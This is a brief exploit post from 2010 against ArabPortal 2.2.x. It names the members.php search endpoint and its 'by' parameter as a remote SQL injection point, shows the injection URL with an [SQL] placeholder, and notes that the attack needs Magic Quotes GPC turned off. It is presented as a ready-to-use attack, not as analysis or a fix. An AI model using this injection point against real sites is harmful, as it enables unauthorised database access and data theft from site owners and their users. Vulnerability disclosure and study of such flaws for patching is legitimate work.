ArabPortal 2.2.x suffers from a remote SQL injection vulnerability.
f6acaa17596ef935eb669b79ee3e3567b5b30ff7b28d97008e5fc32b76b649fe
# Exploit Title: ArabPortal V2.2.x Remote SQL Injection Vulnerability
# Author: SwEET-DeViL
# Published: 10-6-2010
# Software Link:
http://www.arab-portal.info/download.php?action=download&fileid=127
# Version: 2.2.x
# Tested on: Lunix
# Need : Magic Quotes Gpc = Off
|
|
|-------------------------------------------------------
|
|
|-[+ # Exploit :
|
|
|
|
~~
http://www.Site.com/apt/members.php?action=msearch&by=[SQL]#
~~
|
|
|
/---------------------------------------------------\
|+------------------------------------------------+ |
|| SwEET-DeViL | |
|| x0.root@gmail.com | |
|+------------------------------------------------+ |
\---------------------------------------------------/